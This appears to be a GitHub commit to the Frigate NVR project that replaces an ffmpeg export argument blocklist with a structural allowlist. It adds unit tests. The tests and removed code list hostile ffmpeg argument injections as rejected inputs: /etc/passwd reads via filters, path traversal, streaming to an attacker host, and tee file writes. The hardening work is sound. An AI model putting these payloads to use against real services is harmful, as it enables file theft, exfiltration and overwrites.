Replace export ffmpeg argument blocklist with a structural allowlist (#23478)
Some checks are pending
CI / Synaptics Build (push) Blocked by required conditions
CI / AMD64 Build (push) Waiting to run
CI / ARM Build (push) Waiting to run
CI / Jetson Jetpack 6 (push) Waiting to run
CI / AMD64 Extra Build (push) Blocked by required conditions
CI / ARM Extra Build (push) Blocked by required conditions
CI / Assemble and push default build (push) Blocked by required conditions

* use allowlist for custom export ffmpeg args

* reject brackets in export filtergraph validation instead of stripping link labels
This commit is contained in:
Josh Hawkins 2026-06-13 17:43:22 -05:00 committed by GitHub
parent b79ad9871a
commit bc816926a5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 264 additions and 37 deletions

View File

@ -42,33 +42,118 @@ TIMELAPSE_DATA_INPUT_ARGS = "-an -skip_frame nokey"
# Captures the floating-point factor so we can scale expected duration.
SETPTS_FACTOR_RE = re.compile(r"setpts=([0-9]*\.?[0-9]+)\*PTS")
# ffmpeg flags that can read from or write to arbitrary files
BLOCKED_FFMPEG_ARGS = frozenset(
# Allowlisted flags that take no value.
_VALUELESS_FLAGS = frozenset({"-an", "-sn", "-dn"})
# Allowlisted filter flags. Their value is validated as a filtergraph and may
# only reference filters in _SAFE_FILTERS.
_FILTER_FLAGS = frozenset({"-vf", "-af", "-filter"})
# Allowlisted flags that take exactly one value (encoder / muxer-safe options).
_VALUE_FLAGS = frozenset(
{
"-i",
"-filter_script",
"-filter_complex",
"-lavfi",
"-vf",
"-af",
"-filter",
"-vstats_file",
"-passlogfile",
"-sdp_file",
"-dump_attachment",
"-attach",
"-c",
"-codec",
"-b",
"-crf",
"-qp",
"-q",
"-qscale",
"-preset",
"-tune",
"-profile",
"-level",
"-pix_fmt",
"-r",
"-g",
"-keyint_min",
"-sc_threshold",
"-bf",
"-refs",
"-qmin",
"-qmax",
"-maxrate",
"-minrate",
"-bufsize",
"-movflags",
"-threads",
"-aspect",
"-fps_mode",
"-vsync",
"-skip_frame",
}
)
_ALLOWED_FLAGS = _VALUELESS_FLAGS | _FILTER_FLAGS | _VALUE_FLAGS
# Filters that cannot read files, load plugins, or open network sources.
_SAFE_FILTERS = frozenset(
{
"setpts",
"fps",
"scale",
"format",
"transpose",
"hflip",
"vflip",
"crop",
"pad",
"setsar",
"setdar",
}
)
# Conservative shape for a non-filter flag value. Excludes "/" (paths /
# filtergraph division), whitespace, brackets, and a leading "-" so a value
# can never be a path or swallow a following flag. ":" is permitted for values
# like "16:9".
_SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9_.:+][A-Za-z0-9_.:+-]*$")
# Substrings inside a filtergraph that indicate a file-reading filter option.
# "movie=" also matches "amovie=" as a substring.
_BLOCKED_FILTER_VALUE_MARKERS = ("movie=", "textfile=", "filename=", "fontfile=")
def _base_flag(token: str) -> str:
"""Return a flag's base name, lowercased and without its stream specifier.
e.g. "-c:v" -> "-c", "-filter:a:0" -> "-filter".
"""
return token.lower().split(":", 1)[0]
def _validate_filtergraph(value: str) -> tuple[bool, str]:
"""Validate a filtergraph value, allowing only filters in _SAFE_FILTERS."""
# None of the safe filters need any of these
if any(token in value for token in ("://", "..", "[", "]")):
return False, "Invalid filter graph in custom ffmpeg arguments"
lowered = value.lower()
if any(marker in lowered for marker in _BLOCKED_FILTER_VALUE_MARKERS):
return False, "File-reading filters are not allowed in custom ffmpeg arguments"
# Filters are separated by "," within a chain and ";" between chains. Safe
# filters never use unescaped "," or ";" in their arguments, so splitting on
# them to recover filter names cannot hide a disallowed filter.
for spec in re.split(r"[;,]", value):
spec = spec.strip()
if not spec:
continue
name = spec.split("=", 1)[0].strip().lower()
if name not in _SAFE_FILTERS:
return False, f"Filter not allowed in custom ffmpeg arguments: {name}"
return True, ""
def validate_ffmpeg_args(args: str) -> tuple[bool, str]:
"""Validate that user-provided ffmpeg args don't allow input/output injection.
"""Validate user-provided custom export ffmpeg args with an allowlist.
Blocks:
- The -i flag and other flags that read/write arbitrary files
- Filter flags (can read files via movie=/amovie= source filters)
- Absolute/relative file paths (potential extra outputs)
- URLs and ffmpeg protocol references (data exfiltration)
Every token must be an allowlisted flag or the value of one; filter values
may only reference safe filters; and no token may become a bare input or
output URL. This structurally prevents arbitrary file read/write, network
exfiltration/SSRF, and resource-exhaustion via the export endpoint.
Admin users skip this validation entirely since they are trusted.
"""
@ -76,26 +161,36 @@ def validate_ffmpeg_args(args: str) -> tuple[bool, str]:
return True, ""
tokens = args.split()
for token in tokens:
# Block flags that could inject inputs or write to arbitrary files
if token.lower() in BLOCKED_FFMPEG_ARGS:
i = 0
while i < len(tokens):
token = tokens[i]
# A bare (non-flag) token here would be parsed by ffmpeg as an input or
# output URL. Only the server sets inputs/outputs, never the user.
if not token.startswith("-"):
return False, f"Unexpected argument in custom ffmpeg arguments: {token}"
base = _base_flag(token)
if base not in _ALLOWED_FLAGS:
return False, f"Forbidden ffmpeg argument: {token}"
# Block tokens that look like file paths (potential output injection)
if (
token.startswith("/")
or token.startswith("./")
or token.startswith("../")
or token.startswith("~")
):
return False, "File paths are not allowed in custom ffmpeg arguments"
if base in _VALUELESS_FLAGS:
i += 1
continue
# Block URLs and ffmpeg protocol references (e.g. http://, tcp://, pipe:, file:)
if "://" in token or token.startswith("pipe:") or token.startswith("file:"):
return (
False,
"Protocol references are not allowed in custom ffmpeg arguments",
)
# Remaining flags consume exactly one value.
if i + 1 >= len(tokens):
return False, f"Missing value for ffmpeg argument: {token}"
value = tokens[i + 1]
if base in _FILTER_FLAGS:
valid, message = _validate_filtergraph(value)
if not valid:
return False, message
elif not _SAFE_VALUE_RE.match(value):
return False, f"Invalid value for {token}: {value}"
i += 2
return True, ""

132
frigate/test/test_export.py Normal file
View File

@ -0,0 +1,132 @@
import unittest
from frigate.record.export import validate_ffmpeg_args
class TestValidateFfmpegArgs(unittest.TestCase):
"""Tests for the non-admin custom export ffmpeg arg validator.
The validator uses a structural allowlist: every token must be an
allowlisted flag or the value of one, filter values are restricted to a
safe set of filters, and no token may become a bare input/output URL.
"""
def assertRejected(self, args: str) -> None:
valid, message = validate_ffmpeg_args(args)
self.assertFalse(valid, f"expected {args!r} to be rejected")
self.assertNotEqual(message, "")
def assertAllowed(self, args: str) -> None:
valid, message = validate_ffmpeg_args(args)
self.assertTrue(valid, f"expected {args!r} to be allowed, got: {message}")
self.assertEqual(message, "")
# --- legitimate use cases must keep working ---------------------------
def test_timelapse_setpts_allowed(self):
# The whole reason -vf cannot simply be blocked: timelapse exports.
self.assertAllowed("-vf setpts=PTS/60 -r 25")
self.assertAllowed("-vf setpts=0.04*PTS -r 30") # server default
self.assertAllowed("-filter:v setpts=PTS/60 -r 25")
def test_default_input_args_allowed(self):
self.assertAllowed("")
self.assertAllowed("-an -skip_frame nokey")
def test_encoding_args_allowed(self):
self.assertAllowed("-c:v libx264 -crf 23 -preset fast")
self.assertAllowed("-c:v copy -c:a copy")
self.assertAllowed("-c:v libx264 -b:v 2M -maxrate 2M -bufsize 4M")
self.assertAllowed("-movflags +faststart")
self.assertAllowed("-pix_fmt yuv420p -r 30 -g 30")
def test_safe_filters_allowed(self):
self.assertAllowed("-vf scale=640:480")
self.assertAllowed("-vf scale=640:480,setpts=0.5*PTS")
self.assertAllowed("-vf format=yuv420p")
self.assertAllowed("-vf transpose=1")
self.assertAllowed("-vf hflip")
self.assertAllowed("-vf fps=15")
self.assertAllowed("-vf setsar=1 -an")
self.assertAllowed("-vf setdar=16/9")
# --- the reported advisory and file-read class ------------------------
def test_reported_advisory_rejected(self):
self.assertRejected(
"-filter:v drawtext=textfile=/etc/passwd:fontcolor=white:fontsize=20"
)
def test_file_reading_filters_rejected(self):
self.assertRejected("-vf movie=/etc/passwd")
self.assertRejected("-vf drawtext=textfile=/etc/passwd")
self.assertRejected("-vf subtitles=/etc/passwd")
# marker embedded as an option of an otherwise-allowed filter name
self.assertRejected("-vf scale=movie=/etc/passwd")
def test_filtergraph_brackets_rejected(self):
# link labels aren't needed for safe filters; rejecting "[" / "]" keeps
# filtergraph validation linear (no ReDoS on attacker input)
self.assertRejected("-vf [in]scale=640:480[out]")
self.assertRejected("-vf " + "[" * 5000)
def test_preset_file_read_rejected(self):
# cwd-anchored traversal slipped past the old startswith() path check
self.assertRejected("-fpre frigate/../../../etc/passwd")
self.assertRejected("-fpre evil.preset")
self.assertRejected("-vpre x")
self.assertRejected("-apre x")
self.assertRejected("-pre x")
def test_slash_option_file_read_rejected(self):
# ffmpeg "-/option file" reads the option value from a file
self.assertRejected("-/filter:v graph.txt")
self.assertRejected("-/filter_complex graph.txt")
# --- network / SSRF class ---------------------------------------------
def test_schemeless_protocol_rejected(self):
self.assertRejected("-f mpegts tcp:10.0.0.5:4444")
self.assertRejected("tcp:10.0.0.5:4444")
self.assertRejected("udp:10.0.0.5:4444")
self.assertRejected("-progress http:attacker.example.com:80/p")
# --- file-write class --------------------------------------------------
def test_tee_write_rejected(self):
self.assertRejected("-c:v libx264 -map 0 -f tee [f=mpegts]/tmp/owned.ts")
self.assertRejected("-f tee [f=mpegts]/etc/frigate/x.ts")
self.assertRejected("tee:/tmp/x")
def test_bare_output_token_rejected(self):
self.assertRejected("evil.mp4")
self.assertRejected("-c copy evil.mp4")
self.assertRejected("x/../escaped.mkv")
def test_file_producing_muxers_rejected(self):
self.assertRejected("-f hls -hls_segment_filename pwn%03d.ts out.m3u8")
self.assertRejected("-f md5 victim.txt")
self.assertRejected("-f segment seg%03d.ts")
def test_write_flags_rejected(self):
self.assertRejected("-progress evil.log")
self.assertRejected("-stats_enc_pre evil.csv")
self.assertRejected("-report")
# --- resource exhaustion / misc ---------------------------------------
def test_dos_input_flags_rejected(self):
self.assertRejected("-stream_loop -1")
self.assertRejected("-readrate 0.001")
def test_disallowed_flags_rejected(self):
self.assertRejected("-map 0")
self.assertRejected("-i /etc/passwd")
self.assertRejected("-attach evil.bin")
self.assertRejected("-dump_attachment evil.bin")
self.assertRejected("/etc/passwd")
self.assertRejected("-metadata comment=x")
if __name__ == "__main__":
unittest.main()